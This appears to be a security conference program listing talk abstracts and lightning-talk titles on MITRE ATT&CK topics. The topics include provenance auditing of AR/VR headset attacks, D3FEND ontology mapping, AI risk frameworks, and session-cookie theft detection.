Augmented- and virtual-reality head-mounted displays (HMDs) are quickly moving from gaming novelties to mission-critical platforms in medicine, training, and industrial control. Yet today’s security monitoring tools cannot trace attacks that cross the headset/PC boundary or exploit the unique sensory pipeline of immersive systems. We introduce REALITYCHECK, the first provenance-based auditing framework that maps the entire AR/VR kill-chain to MITRE ATT&CK tactics, techniques, and procedures (TTPs) and then reconstructs each step in a single multilayer provenance graph. Starting from an eight-attribute threat model derived from 25 real-world exploits, we extend the W3C PROV ontology with new entities such as SpatialBoundary and HeadsetCollisionTracker and automatically correlate logs from OpenXR, Android, and Windows endpoints. A novel session-state execution-partitioning algorithm eliminates 70% of false dependencies, while graph-pruning retains only the vertices and edges that form Direct or Indirect Forensic Connections to ATT&CK-labelled detection points. Evaluated on Meta Quest 2 (90% of the HMD market) against 25 attacks, including new ATT&CK-aligned techniques for Perceptual Manipulation, 6DoF Data Exfiltration, and Endpoint-Driven Lateral Movement, REALITYCHECK achieved perfect root-cause coverage with <6% runtime overhead. Attendees will leave with an open-source tool and a reproducible methodology for building ATT&CK-driven detections in emerging XR environments.

D3FEND Before You ATT&CK

Tareq AlKhatib, Fortinet

At ATT&CKcon 5.0, we made the case that ATT&CK objects can be represented in graph format by defining a common cyber-ontology. Since then, we have been working with the D3FEND team to define ATT&CK objects using the D3FEND ontology. This talk shares our progress on this front, including how we redefine Data Sources, Techniques, and Procedures. We also show how the audience can use this work to redefine how they do detection engineering and incident response using ontology/graph-based principles.

Assess and Address Practical Limitations of ATT&CK and ATLAS in Artificial Intelligence (AI) Risk Management

Emily Soward and Trey Blalock, Applied Threat Intelligence Group

Securing AI systems and organizations using AI is a fast-evolving space in emerging risk. This talk contextualizes ATT&CK and its derivative framework ATLAS against current risk management frameworks with practical examples, drawn from real examples as well as applied experience in framework and resource development for AI security. Attendees familiar with ATT&CK will take away an understanding of where AI systems are at risk, limitations of MITRE frameworks for AI attacks today and corresponding solutions, and ways to enhance defenses. No AI experience needed.

Lightning Talk: From ATT&CK Innie to ATT&CK Outie

Tracy Fu

Lightning Talk: Tie Fighters in Quantumania

Ivan Ninichuck

Lightning Talk: Enterprise Scale Third Party SaaS Security at Enterprise Scale

Rashique Mustahseen

Lightning Talk: Is GPT-5 Easier to Jailbreak - or Are We Assessing it Wrong?

Roman Vainshtein

Lightning Talk: Operationalizing Blockchain TTPs for Threat Modeling (ATT&CK-aligned)

Dohoon Kim

Lightning Talk: Your Detections Don’t See Cookies: Bringing Stolen Session Artifacts into ATT&CK v6

Tyson McAllister and Sam Curet

Lightning Talk: Evaluating the Impact of ATT&CK techniques

Wade Baker

Sponsors